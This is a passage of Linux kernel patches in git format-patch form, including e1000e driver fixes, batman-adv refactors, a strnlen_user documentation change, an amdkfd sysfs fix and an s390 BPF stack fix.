" for the same reason that required flushing the descriptor rings. This fix disables MULR for the loopback test to avoid the hang state. Signed-off-by: Yanir Lubetkin Tested-by: Aaron Brown Signed-off-by: Jeff Kirsher --- drivers/net/ethernet/intel/e1000e/ethtool.c | 27 ++++++++++++++++++--- 1 file changed, 24 insertions(+), 3 deletions(-) diff --git a/drivers/net/ethernet/intel/e1000e/ethtool.c b/drivers/net/ethernet/intel/e1000e/ethtool.c index 11f486e4ff7b..c62f0db6dcb0 100644 --- a/drivers/net/ethernet/intel/e1000e/ethtool.c +++ b/drivers/net/ethernet/intel/e1000e/ethtool.c @@ -1516,8 +1516,19 @@ static int e1000_set_es2lan_mac_loopback(struct e1000_adapter *adapter) static int e1000_setup_loopback_test(struct e1000_adapter *adapter) { struct e1000_hw *hw = &adapter->hw; - u32 rctl; - + u32 rctl, fext_nvm11, tarc0; + + if (hw->mac.type == e1000_pch_spt) { + fext_nvm11 = er32(FEXTNVM11); + fext_nvm11 |= E1000_FEXTNVM11_DISABLE_MULR_FIX; + ew32(FEXTNVM11, fext_nvm11); + tarc0 = er32(TARC(0)); + /* clear bits 28 & 29 (control of MULR concurrent requests) */ + tarc0 &= 0xcfffffff; + /* set bit 29 (value of MULR requests is now 2) */ + tarc0 |= 0x20000000; + ew32(TARC(0), tarc0); + } if (hw->phy.media_type == e1000_media_type_fiber || hw->phy.media_type == e1000_media_type_internal_serdes) { switch (hw->mac.type) { @@ -1542,7 +1553,7 @@ static int e1000_setup_loopback_test(struct e1000_adapter *adapter) static void e1000_loopback_cleanup(struct e1000_adapter *adapter) { struct e1000_hw *hw = &adapter->hw; - u32 rctl; + u32 rctl, fext_nvm11, tarc0; u16 phy_reg; rctl = er32(RCTL); @@ -1550,6 +1561,16 @@ static void e1000_loopback_cleanup(struct e1000_adapter *adapter) ew32(RCTL, rctl); switch (hw->mac.type) { + case e1000_pch_spt: + fext_nvm11 = er32(FEXTNVM11); + fext_nvm11 &= ~E1000_FEXTNVM11_DISABLE_MULR_FIX; + ew32(FEXTNVM11, fext_nvm11); + tarc0 = er32(TARC(0)); + /* clear bits 28 & 29 (control of MULR concurrent requests) */ + /* set bit 29 (value of MULR requests is now 0) */ + tarc0 &= 0xcfffffff; + ew32(TARC(0), tarc0); + /* fall through */ case e1000_80003es2lan: if (hw->phy.media_type == e1000_media_type_fiber || hw->phy.media_type == e1000_media_type_internal_serdes) { From 529498cde04537211cc3aa8f920c371b91c0f7d8 Mon Sep 17 00:00:00 2001 From: Yanir Lubetkin Date: Tue, 2 Jun 2015 17:05:50 +0300 Subject: [PATCH 654/872] e1000e: Bump the version to 3.2.5 Bump the version to reflect the driver changes and bug fixes for i219. Also update the copyright, while we are at it. Signed-off-by: Yanir Lubetkin Tested-by: Aaron Brown Signed-off-by: Jeff Kirsher --- drivers/net/ethernet/intel/e1000e/80003es2lan.c | 2 +- drivers/net/ethernet/intel/e1000e/80003es2lan.h | 2 +- drivers/net/ethernet/intel/e1000e/82571.c | 2 +- drivers/net/ethernet/intel/e1000e/82571.h | 2 +- drivers/net/ethernet/intel/e1000e/defines.h | 2 +- drivers/net/ethernet/intel/e1000e/e1000.h | 2 +- drivers/net/ethernet/intel/e1000e/ethtool.c | 2 +- drivers/net/ethernet/intel/e1000e/hw.h | 2 +- drivers/net/ethernet/intel/e1000e/ich8lan.c | 2 +- drivers/net/ethernet/intel/e1000e/ich8lan.h | 2 +- drivers/net/ethernet/intel/e1000e/mac.c | 2 +- drivers/net/ethernet/intel/e1000e/mac.h | 2 +- drivers/net/ethernet/intel/e1000e/manage.c | 2 +- drivers/net/ethernet/intel/e1000e/manage.h | 2 +- drivers/net/ethernet/intel/e1000e/netdev.c | 6 +++--- drivers/net/ethernet/intel/e1000e/nvm.c | 2 +- drivers/net/ethernet/intel/e1000e/nvm.h | 2 +- drivers/net/ethernet/intel/e1000e/param.c | 2 +- drivers/net/ethernet/intel/e1000e/phy.c | 2 +- drivers/net/ethernet/intel/e1000e/phy.h | 2 +- drivers/net/ethernet/intel/e1000e/ptp.c | 2 +- drivers/net/ethernet/intel/e1000e/regs.h | 2 +- 22 files changed, 24 insertions(+), 24 deletions(-) diff --git a/drivers/net/ethernet/intel/e1000e/80003es2lan.c b/drivers/net/ethernet/intel/e1000e/80003es2lan.c index 08f22f348800..2af603f3e418 100644 --- a/drivers/net/ethernet/intel/e1000e/80003es2lan.c +++ b/drivers/net/ethernet/intel/e1000e/80003es2lan.c @@ -1,5 +1,5 @@ /* Intel PRO/1000 Linux driver - * Copyright(c) 1999 - 2014 Intel Corporation. + * Copyright(c) 1999 - 2015 Intel Corporation. * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, diff --git a/drivers/net/ethernet/intel/e1000e/80003es2lan.h b/drivers/net/ethernet/intel/e1000e/80003es2lan.h index 535a9430976d..a2162e11673e 100644 --- a/drivers/net/ethernet/intel/e1000e/80003es2lan.h +++ b/drivers/net/ethernet/intel/e1000e/80003es2lan.h @@ -1,5 +1,5 @@ /* Intel PRO/1000 Linux driver - * Copyright(c) 1999 - 2014 Intel Corporation. + * Copyright(c) 1999 - 2015 Intel Corporation. * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, diff --git a/drivers/net/ethernet/intel/e1000e/82571.c b/drivers/net/ethernet/intel/e1000e/82571.c index 32e77755a9c6..5f7016442ec4 100644 --- a/drivers/net/ethernet/intel/e1000e/82571.c +++ b/drivers/net/ethernet/intel/e1000e/82571.c @@ -1,5 +1,5 @@ /* Intel PRO/1000 Linux driver - * Copyright(c) 1999 - 2014 Intel Corporation. + * Copyright(c) 1999 - 2015 Intel Corporation. * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, diff --git a/drivers/net/ethernet/intel/e1000e/82571.h b/drivers/net/ethernet/intel/e1000e/82571.h index 2e758f796d60..abc6a9abff98 100644 --- a/drivers/net/ethernet/intel/e1000e/82571.h +++ b/drivers/net/ethernet/intel/e1000e/82571.h @@ -1,5 +1,5 @@ /* Intel PRO/1000 Linux driver - * Copyright(c) 1999 - 2014 Intel Corporation. + * Copyright(c) 1999 - 2015 Intel Corporation. * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, diff --git a/drivers/net/ethernet/intel/e1000e/defines.h b/drivers/net/ethernet/intel/e1000e/defines.h index 0570c668ec3d..133d4074dbe4 100644 --- a/drivers/net/ethernet/intel/e1000e/defines.h +++ b/drivers/net/ethernet/intel/e1000e/defines.h @@ -1,5 +1,5 @@ /* Intel PRO/1000 Linux driver - * Copyright(c) 1999 - 2014 Intel Corporation. + * Copyright(c) 1999 - 2015 Intel Corporation. * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, diff --git a/drivers/net/ethernet/intel/e1000e/e1000.h b/drivers/net/ethernet/intel/e1000e/e1000.h index 7d8a45c9a40c..0b748d1959d9 100644 --- a/drivers/net/ethernet/intel/e1000e/e1000.h +++ b/drivers/net/ethernet/intel/e1000e/e1000.h @@ -1,5 +1,5 @@ /* Intel PRO/1000 Linux driver - * Copyright(c) 1999 - 2014 Intel Corporation. + * Copyright(c) 1999 - 2015 Intel Corporation. * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, diff --git a/drivers/net/ethernet/intel/e1000e/ethtool.c b/drivers/net/ethernet/intel/e1000e/ethtool.c index c62f0db6dcb0..ad6daa656d3e 100644 --- a/drivers/net/ethernet/intel/e1000e/ethtool.c +++ b/drivers/net/ethernet/intel/e1000e/ethtool.c @@ -1,5 +1,5 @@ /* Intel PRO/1000 Linux driver - * Copyright(c) 1999 - 2014 Intel Corporation. + * Copyright(c) 1999 - 2015 Intel Corporation. * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, diff --git a/drivers/net/ethernet/intel/e1000e/hw.h b/drivers/net/ethernet/intel/e1000e/hw.h index 19e8c487db06..c9da4654e9ca 100644 --- a/drivers/net/ethernet/intel/e1000e/hw.h +++ b/drivers/net/ethernet/intel/e1000e/hw.h @@ -1,5 +1,5 @@ /* Intel PRO/1000 Linux driver - * Copyright(c) 1999 - 2014 Intel Corporation. + * Copyright(c) 1999 - 2015 Intel Corporation. * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, diff --git a/drivers/net/ethernet/intel/e1000e/ich8lan.c b/drivers/net/ethernet/intel/e1000e/ich8lan.c index d9f7b934b516..b074b9a667b3 100644 --- a/drivers/net/ethernet/intel/e1000e/ich8lan.c +++ b/drivers/net/ethernet/intel/e1000e/ich8lan.c @@ -1,5 +1,5 @@ /* Intel PRO/1000 Linux driver - * Copyright(c) 1999 - 2014 Intel Corporation. + * Copyright(c) 1999 - 2015 Intel Corporation. * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, diff --git a/drivers/net/ethernet/intel/e1000e/ich8lan.h b/drivers/net/ethernet/intel/e1000e/ich8lan.h index 193c445773fa..26459853c6be 100644 --- a/drivers/net/ethernet/intel/e1000e/ich8lan.h +++ b/drivers/net/ethernet/intel/e1000e/ich8lan.h @@ -1,5 +1,5 @@ /* Intel PRO/1000 Linux driver - * Copyright(c) 1999 - 2014 Intel Corporation. + * Copyright(c) 1999 - 2015 Intel Corporation. * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, diff --git a/drivers/net/ethernet/intel/e1000e/mac.c b/drivers/net/ethernet/intel/e1000e/mac.c index 30b74d590bee..e59d7c283cd4 100644 --- a/drivers/net/ethernet/intel/e1000e/mac.c +++ b/drivers/net/ethernet/intel/e1000e/mac.c @@ -1,5 +1,5 @@ /* Intel PRO/1000 Linux driver - * Copyright(c) 1999 - 2014 Intel Corporation. + * Copyright(c) 1999 - 2015 Intel Corporation. * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, diff --git a/drivers/net/ethernet/intel/e1000e/mac.h b/drivers/net/ethernet/intel/e1000e/mac.h index 0513d90cdeea..8284618af9ff 100644 --- a/drivers/net/ethernet/intel/e1000e/mac.h +++ b/drivers/net/ethernet/intel/e1000e/mac.h @@ -1,5 +1,5 @@ /* Intel PRO/1000 Linux driver - * Copyright(c) 1999 - 2014 Intel Corporation. + * Copyright(c) 1999 - 2015 Intel Corporation. * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, diff --git a/drivers/net/ethernet/intel/e1000e/manage.c b/drivers/net/ethernet/intel/e1000e/manage.c index 06edfca1a35e..cc9b3befc2bc 100644 --- a/drivers/net/ethernet/intel/e1000e/manage.c +++ b/drivers/net/ethernet/intel/e1000e/manage.c @@ -1,5 +1,5 @@ /* Intel PRO/1000 Linux driver - * Copyright(c) 1999 - 2014 Intel Corporation. + * Copyright(c) 1999 - 2015 Intel Corporation. * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, diff --git a/drivers/net/ethernet/intel/e1000e/manage.h b/drivers/net/ethernet/intel/e1000e/manage.h index a8c27f98f7b0..0b9ea5952b07 100644 --- a/drivers/net/ethernet/intel/e1000e/manage.h +++ b/drivers/net/ethernet/intel/e1000e/manage.h @@ -1,5 +1,5 @@ /* Intel PRO/1000 Linux driver - * Copyright(c) 1999 - 2014 Intel Corporation. + * Copyright(c) 1999 - 2015 Intel Corporation. * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, diff --git a/drivers/net/ethernet/intel/e1000e/netdev.c b/drivers/net/ethernet/intel/e1000e/netdev.c index b7035bc79e76..e62b9dcb91fe 100644 --- a/drivers/net/ethernet/intel/e1000e/netdev.c +++ b/drivers/net/ethernet/intel/e1000e/netdev.c @@ -1,5 +1,5 @@ /* Intel PRO/1000 Linux driver - * Copyright(c) 1999 - 2014 Intel Corporation. + * Copyright(c) 1999 - 2015 Intel Corporation. * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, @@ -48,7 +48,7 @@ #define DRV_EXTRAVERSION "-k" -#define DRV_VERSION "2.3.2" DRV_EXTRAVERSION +#define DRV_VERSION "3.2.5" DRV_EXTRAVERSION char e1000e_driver_name[] = "e1000e"; const char e1000e_driver_version[] = DRV_VERSION; @@ -7438,7 +7438,7 @@ static int __init e1000_init_module(void) pr_info("Intel(R) PRO/1000 Network Driver - %s\n", e1000e_driver_version); - pr_info("Copyright(c) 1999 - 2014 Intel Corporation.\n"); + pr_info("Copyright(c) 1999 - 2015 Intel Corporation.\n"); ret = pci_register_driver(&e1000_driver); return ret; diff --git a/drivers/net/ethernet/intel/e1000e/nvm.c b/drivers/net/ethernet/intel/e1000e/nvm.c index fa6b1036a327..49f205c023bf 100644 --- a/drivers/net/ethernet/intel/e1000e/nvm.c +++ b/drivers/net/ethernet/intel/e1000e/nvm.c @@ -1,5 +1,5 @@ /* Intel PRO/1000 Linux driver - * Copyright(c) 1999 - 2014 Intel Corporation. + * Copyright(c) 1999 - 2015 Intel Corporation. * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, diff --git a/drivers/net/ethernet/intel/e1000e/nvm.h b/drivers/net/ethernet/intel/e1000e/nvm.h index 342bf69efab5..5d46967e0d1f 100644 --- a/drivers/net/ethernet/intel/e1000e/nvm.h +++ b/drivers/net/ethernet/intel/e1000e/nvm.h @@ -1,5 +1,5 @@ /* Intel PRO/1000 Linux driver - * Copyright(c) 1999 - 2014 Intel Corporation. + * Copyright(c) 1999 - 2015 Intel Corporation. * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, diff --git a/drivers/net/ethernet/intel/e1000e/param.c b/drivers/net/ethernet/intel/e1000e/param.c index aa1923f7ebdd..6d8c39abee16 100644 --- a/drivers/net/ethernet/intel/e1000e/param.c +++ b/drivers/net/ethernet/intel/e1000e/param.c @@ -1,5 +1,5 @@ /* Intel PRO/1000 Linux driver - * Copyright(c) 1999 - 2014 Intel Corporation. + * Copyright(c) 1999 - 2015 Intel Corporation. * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, diff --git a/drivers/net/ethernet/intel/e1000e/phy.c b/drivers/net/ethernet/intel/e1000e/phy.c index b2005e13fb01..de13aeacae97 100644 --- a/drivers/net/ethernet/intel/e1000e/phy.c +++ b/drivers/net/ethernet/intel/e1000e/phy.c @@ -1,5 +1,5 @@ /* Intel PRO/1000 Linux driver - * Copyright(c) 1999 - 2014 Intel Corporation. + * Copyright(c) 1999 - 2015 Intel Corporation. * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, diff --git a/drivers/net/ethernet/intel/e1000e/phy.h b/drivers/net/ethernet/intel/e1000e/phy.h index 537d2780b408..55bfe473514d 100644 --- a/drivers/net/ethernet/intel/e1000e/phy.h +++ b/drivers/net/ethernet/intel/e1000e/phy.h @@ -1,5 +1,5 @@ /* Intel PRO/1000 Linux driver - * Copyright(c) 1999 - 2014 Intel Corporation. + * Copyright(c) 1999 - 2015 Intel Corporation. * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, diff --git a/drivers/net/ethernet/intel/e1000e/ptp.c b/drivers/net/ethernet/intel/e1000e/ptp.c index 8d7b21dc7e19..25a0ad5102d6 100644 --- a/drivers/net/ethernet/intel/e1000e/ptp.c +++ b/drivers/net/ethernet/intel/e1000e/ptp.c @@ -1,5 +1,5 @@ /* Intel PRO/1000 Linux driver - * Copyright(c) 1999 - 2014 Intel Corporation. + * Copyright(c) 1999 - 2015 Intel Corporation. * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, diff --git a/drivers/net/ethernet/intel/e1000e/regs.h b/drivers/net/ethernet/intel/e1000e/regs.h index 110e27e35ff5..b24e5fee17f2 100644 --- a/drivers/net/ethernet/intel/e1000e/regs.h +++ b/drivers/net/ethernet/intel/e1000e/regs.h @@ -1,5 +1,5 @@ /* Intel PRO/1000 Linux driver - * Copyright(c) 1999 - 2014 Intel Corporation. + * Copyright(c) 1999 - 2015 Intel Corporation. * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, From 21102626da60a6fcb0458e4040ee4739f04652e8 Mon Sep 17 00:00:00 2001 From: Markus Pargmann Date: Fri, 26 Dec 2014 12:41:37 +0100 Subject: [PATCH 655/872] batman-adv: types, Fix comment on bcast_own batadv_orig_bat_iv->bcast_own is actually not a bitfield, it is an array. Adjust the comment accordingly. Signed-off-by: Markus Pargmann Signed-off-by: Antonio Quartulli Signed-off-by: Marek Lindner --- net/batman-adv/types.h | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/net/batman-adv/types.h b/net/batman-adv/types.h index e95db4273356..c1000c0d6b0d 100644 --- a/net/batman-adv/types.h +++ b/net/batman-adv/types.h @@ -183,9 +183,10 @@ struct batadv_orig_node_vlan { /** * struct batadv_orig_bat_iv - B.A.T.M.A.N. IV private orig_node members - * @bcast_own: bitfield containing the number of our OGMs this orig_node - * rebroadcasted "back" to us (relative to last_real_seqno) - * @bcast_own_sum: counted result of bcast_own + * @bcast_own: set of bitfields (one per hard interface) where each one counts + * the number of our OGMs this orig_node rebroadcasted "back" to us (relative + * to last_real_seqno). Every bitfield is BATADV_TQ_LOCAL_WINDOW_SIZE bits long. + * @bcast_own_sum: sum of bcast_own * @ogm_cnt_lock: lock protecting bcast_own, bcast_own_sum, * neigh_node->bat_iv.real_bits & neigh_node->bat_iv.real_packet_count */ From a0c77227ffd0ad371cfde84458f440bcde5ab048 Mon Sep 17 00:00:00 2001 From: Sven Eckelmann Date: Sun, 1 Mar 2015 16:56:26 +0100 Subject: [PATCH 656/872] batman-adv: Remove unnecessary check for orig_ifinfo not NULL orig_ifinfo is dereferenced multiple times in batadv_iv_ogm_update_seqnos before the check for NULL is done. The function also exists at the beginning when orig_ifinfo would have been NULL. This makes the check at the end unnecessary and only confuses the reader/code analyzers. Signed-off-by: Sven Eckelmann Signed-off-by: Marek Lindner --- net/batman-adv/bat_iv_ogm.c | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/net/batman-adv/bat_iv_ogm.c b/net/batman-adv/bat_iv_ogm.c index 9f83137a6514..4e93d2d3958b 100644 --- a/net/batman-adv/bat_iv_ogm.c +++ b/net/batman-adv/bat_iv_ogm.c @@ -1357,8 +1357,7 @@ batadv_iv_ogm_update_seqnos(const struct ethhdr *ethhdr, out: spin_unlock_bh(&orig_node->bat_iv.ogm_cnt_lock); batadv_orig_node_free_ref(orig_node); - if (orig_ifinfo) - batadv_orig_ifinfo_free_ref(orig_ifinfo); + batadv_orig_ifinfo_free_ref(orig_ifinfo); return ret; } From e8ad3b1acfbb022b495f12f4ed6e825d5f53546a Mon Sep 17 00:00:00 2001 From: Markus Pargmann Date: Fri, 26 Dec 2014 12:41:38 +0100 Subject: [PATCH 657/872] batman-adv: main, Convert is_my_mac() to bool It is much clearer to see a bool type as return value than 'int' for functions that are supposed to return true or false. Signed-off-by: Markus Pargmann Signed-off-by: Marek Lindner --- net/batman-adv/main.c | 11 +++++++---- net/batman-adv/main.h | 2 +- 2 files changed, 8 insertions(+), 5 deletions(-) diff --git a/net/batman-adv/main.c b/net/batman-adv/main.c index fd9333dffc97..a22247a61d3e 100644 --- a/net/batman-adv/main.c +++ b/net/batman-adv/main.c @@ -209,10 +209,13 @@ void batadv_mesh_free(struct net_device *soft_iface) * interfaces in the current mesh * @bat_priv: the bat priv with all the soft interface information * @addr: the address to check + * + * Returns 'true' if the mac address was found, false otherwise. */ -int batadv_is_my_mac(struct batadv_priv *bat_priv, const uint8_t *addr) +bool batadv_is_my_mac(struct batadv_priv *bat_priv, const uint8_t *addr) { const struct batadv_hard_iface *hard_iface; + bool is_my_mac = false; rcu_read_lock(); list_for_each_entry_rcu(hard_iface, &batadv_hardif_list, list) { @@ -223,12 +226,12 @@ int batadv_is_my_mac(struct batadv_priv *bat_priv, const uint8_t *addr) continue; if (batadv_compare_eth(hard_iface->net_dev->dev_addr, addr)) { - rcu_read_unlock(); - return 1; + is_my_mac = true; + break; } } rcu_read_unlock(); - return 0; + return is_my_mac; } /** diff --git a/net/batman-adv/main.h b/net/batman-adv/main.h index 026ba37f31a6..96876d29f952 100644 --- a/net/batman-adv/main.h +++ b/net/batman-adv/main.h @@ -195,7 +195,7 @@ extern struct workqueue_struct *batadv_event_workqueue; int batadv_mesh_init(struct net_device *soft_iface); void batadv_mesh_free(struct net_device *soft_iface); -int batadv_is_my_mac(struct batadv_priv *bat_priv, const uint8_t *addr); +bool batadv_is_my_mac(struct batadv_priv *bat_priv, const uint8_t *addr); struct batadv_hard_iface * batadv_seq_print_text_primary_if_get(struct seq_file *seq); int batadv_max_header_len(void); From f2d5cf2add74ac066572b5215ba8a33dfcf0b85c Mon Sep 17 00:00:00 2001 From: Markus Pargmann Date: Fri, 26 Dec 2014 12:41:39 +0100 Subject: [PATCH 658/872] batman-adv: main, batadv_compare_eth return bool Declare the returntype of batadv_compare_eth as bool. The function called inside this helper function (ether_addr_equal_unaligned) also uses bool as return value, so there is no need to return int. Signed-off-by: Markus Pargmann Signed-off-by: Marek Lindner --- net/batman-adv/main.h | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/net/batman-adv/main.h b/net/batman-adv/main.h index 96876d29f952..af0a3361d4b2 100644 --- a/net/batman-adv/main.h +++ b/net/batman-adv/main.h @@ -279,7 +279,7 @@ static inline void _batadv_dbg(int type __always_unused, * * note: can't use ether_addr_equal() as it requires aligned memory */ -static inline int batadv_compare_eth(const void *data1, const void *data2) +static inline bool batadv_compare_eth(const void *data1, const void *data2) { return ether_addr_equal_unaligned(data1, data2); } From 9fb6c6519b10aee4815591122ce59ce4b63fc44b Mon Sep 17 00:00:00 2001 From: Markus Pargmann Date: Fri, 26 Dec 2014 12:41:40 +0100 Subject: [PATCH 659/872] batman-adv: Remove unnecessary ret variable We can avoid this indirect return variable by directly returning the error values. Signed-off-by: Markus Pargmann Signed-off-by: Marek Lindner --- net/batman-adv/main.c | 11 +++-------- 1 file changed, 3 insertions(+), 8 deletions(-) diff --git a/net/batman-adv/main.c b/net/batman-adv/main.c index a22247a61d3e..49f07e1e0f5f 100644 --- a/net/batman-adv/main.c +++ b/net/batman-adv/main.c @@ -513,14 +513,12 @@ static struct batadv_algo_ops *batadv_algo_get(char *name) int batadv_algo_register(struct batadv_algo_ops *bat_algo_ops) { struct batadv_algo_ops *bat_algo_ops_tmp; - int ret; bat_algo_ops_tmp = batadv_algo_get(bat_algo_ops->name); if (bat_algo_ops_tmp) { pr_info("Trying to register already registered routing algorithm: %s\n", bat_algo_ops->name); - ret = -EEXIST; - goto out; + return -EEXIST; } /* all algorithms must implement all ops (for now) */ @@ -534,16 +532,13 @@ int batadv_algo_register(struct batadv_algo_ops *bat_algo_ops) !bat_algo_ops->bat_neigh_is_equiv_or_better) { pr_info("Routing algo '%s' does not implement required ops\n", bat_algo_ops->name); - ret = -EINVAL; - goto out; + return -EINVAL; } INIT_HLIST_NODE(&bat_algo_ops->list); hlist_add_head(&bat_algo_ops->list, &batadv_algo_list); - ret = 0; -out: - return ret; + return 0; } int batadv_algo_select(struct batadv_priv *bat_priv, char *name) From f372d09059a67f57b3d2b5eab8c05b0ddb8ca92f Mon Sep 17 00:00:00 2001 From: Markus Pargmann Date: Fri, 26 Dec 2014 12:41:41 +0100 Subject: [PATCH 660/872] batman-adv: Remove unnecessary ret variable in algo_register Remove ret variable and all jumps. Signed-off-by: Markus Pargmann Signed-off-by: Marek Lindner --- net/batman-adv/main.c | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/net/batman-adv/main.c b/net/batman-adv/main.c index 49f07e1e0f5f..548e405d13c1 100644 --- a/net/batman-adv/main.c +++ b/net/batman-adv/main.c @@ -544,17 +544,14 @@ int batadv_algo_register(struct batadv_algo_ops *bat_algo_ops) int batadv_algo_select(struct batadv_priv *bat_priv, char *name) { struct batadv_algo_ops *bat_algo_ops; - int ret = -EINVAL; bat_algo_ops = batadv_algo_get(name); if (!bat_algo_ops) - goto out; + return -EINVAL; bat_priv->bat_algo_ops = bat_algo_ops; - ret = 0; -out: - return ret; + return 0; } int batadv_algo_seq_print_text(struct seq_file *seq, void *offset) From 226a07ef0a5a2dfad4cce1a5c226c4cb7370d41f Mon Sep 17 00:00:00 2001 From: Jan Kara Date: Wed, 3 Jun 2015 15:50:35 +0200 Subject: [PATCH 661/872] lib: Clarify the return value of strnlen_user() strnlen_user() can return a number in a range 0 to count + sizeof(unsigned long) - 1. Clarify the comment at the top of the function so that users don't think the function returns at most count+1. Signed-off-by: Jan Kara [ Also added commentary about preferably not using this function ] Signed-off-by: Linus Torvalds --- lib/strnlen_user.c | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/lib/strnlen_user.c b/lib/strnlen_user.c index 11649615c505..fe9a32591c24 100644 --- a/lib/strnlen_user.c +++ b/lib/strnlen_user.c @@ -90,8 +90,15 @@ static inline long do_strnlen_user(const char __user *src, unsigned long count, * Get the size of a NUL-terminated string in user space. * * Returns the size of the string INCLUDING the terminating NUL. - * If the string is too long, returns 'count+1'. + * If the string is too long, returns a number larger than @count. User + * has to check the return value against "> count". * On exception (or invalid count), returns 0. + * + * NOTE! You should basically never use this function. There is + * almost never any valid case for using the length of a user space + * string, since the string can be changed at any time by other + * threads. Use "strncpy_from_user()" instead to get a stable copy + * of the string. */ long strnlen_user(const char __user *str, long count) { From 826f5de84ceb6f96306ce4081b75a0539d8edd00 Mon Sep 17 00:00:00 2001 From: Alexey Skidanov Date: Sun, 30 Nov 2014 15:03:51 +0200 Subject: [PATCH 662/872] drm/amdkfd: fix topology bug with capability attr. This patch fixes a bug where the number of watch points was shown before it was actually calculated Signed-off-by: Alexey Skidanov Cc: stable@vger.kernel.org Signed-off-by: Oded Gabbay --- drivers/gpu/drm/amd/amdkfd/kfd_topology.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_topology.c b/drivers/gpu/drm/amd/amdkfd/kfd_topology.c index e469c4b2e8cc..c25728bc388a 100644 --- a/drivers/gpu/drm/amd/amdkfd/kfd_topology.c +++ b/drivers/gpu/drm/amd/amdkfd/kfd_topology.c @@ -684,8 +684,6 @@ static ssize_t node_show(struct kobject *kobj, struct attribute *attr, dev->node_props.cpu_core_id_base); sysfs_show_32bit_prop(buffer, "simd_id_base", dev->node_props.simd_id_base); - sysfs_show_32bit_prop(buffer, "capability", - dev->node_props.capability); sysfs_show_32bit_prop(buffer, "max_waves_per_simd", dev->node_props.max_waves_per_simd); sysfs_show_32bit_prop(buffer, "lds_size_in_kb", @@ -736,6 +734,8 @@ static ssize_t node_show(struct kobject *kobj, struct attribute *attr, dev->gpu->kfd2kgd->get_fw_version( dev->gpu->kgd, KGD_ENGINE_MEC1)); + sysfs_show_32bit_prop(buffer, "capability", + dev->node_props.capability); } return sysfs_show_32bit_prop(buffer, "max_engine_clk_ccompute", From 08602d74bad6cd6de6866ca6e1adf30c45139931 Mon Sep 17 00:00:00 2001 From: Stephen Hemminger Date: Wed, 3 Jun 2015 13:32:02 -0700 Subject: [PATCH 663/872] MAINTAINERS - remove OSDL reference OSDL has been gone for many years, looks like there still was one reference to it. Signed-off-by: Stephen Hemminger Signed-off-by: Linus Torvalds --- MAINTAINERS | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/MAINTAINERS b/MAINTAINERS index e30871880fdb..a5b8584da5bf 100644 --- a/MAINTAINERS +++ b/MAINTAINERS @@ -51,9 +51,9 @@ trivial patch so apply some common sense. or does something very odd once a month document it. PLEASE remember that submissions must be made under the terms - of the OSDL certificate of contribution and should include a - Signed-off-by: line. The current version of this "Developer's - Certificate of Origin" (DCO) is listed in the file + of the Linux Foundation certificate of contribution and should + include a Signed-off-by: line. The current version of this + "Developer's Certificate of Origin" (DCO) is listed in the file Documentation/SubmittingPatches. 6. Make sure you have the right to send any changes you make. If you From bbac1c94880cb8c7e093718897f4822f3933dd3c Mon Sep 17 00:00:00 2001 From: Michael Holzheu Date: Mon, 1 Jun 2015 22:48:34 -0700 Subject: [PATCH 664/872] s390/bpf: fix stack allocation On s390x we have to provide 160 bytes stack space before we can call the next function. From the 160 bytes that we got from the previous function we only use 11 * 8 bytes and have 160 - 11 * 8 bytes left. Currently for BPF we allocate additional 160 - 11 * 8 bytes for the next function. This is wrong because then the next function only gets: (160 - 11 * 8) + (160 - 11 * 8) = 2 * 72 = 144 bytes Fix this and allocate enough memory for the next function. Fixes: 054623105728 ("s390/bpf: Add s390x eBPF JIT compiler backend") Signed-off-by: Michael Holzheu Acked-by: Heiko Carstens Signed-off-by: Alexei Starovoitov Signed-off-by: David S. Miller --- arch/s390/net/bpf_jit.h | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/arch/s390/net/bpf_jit.h b/arch/s390/net/bpf_jit.h index ba8593a515ba..de156ba3bd71 100644 --- a/arch/s390/net/bpf_jit.h +++ b/arch/s390/net/bpf_jit.h @@ -48,7 +48,9 @@ extern u8 sk_load_word[], sk_load_half[], sk_load_byte[]; * We get 160 bytes stack space from calling function, but only use * 11 * 8 byte (old backchain + r15 - r6) for storing registers. */ -#define STK_OFF (MAX_BPF_STACK + 8 + 4 + 4 + (160 - 11 * 8)) +#define STK_SPACE (MAX_BPF_STACK + 8 + 4 + 4 + 160) +#define STK_160_UNUSED (160 - 11 * 8) +#define STK_OFF (STK_SPACE - STK_160_UNUSED) #define STK_OFF_TMP 160 /* Offset of tmp buffer on stack */ #define STK_OFF_HLEN 168 /* Offset of SKB header length on stack */ From 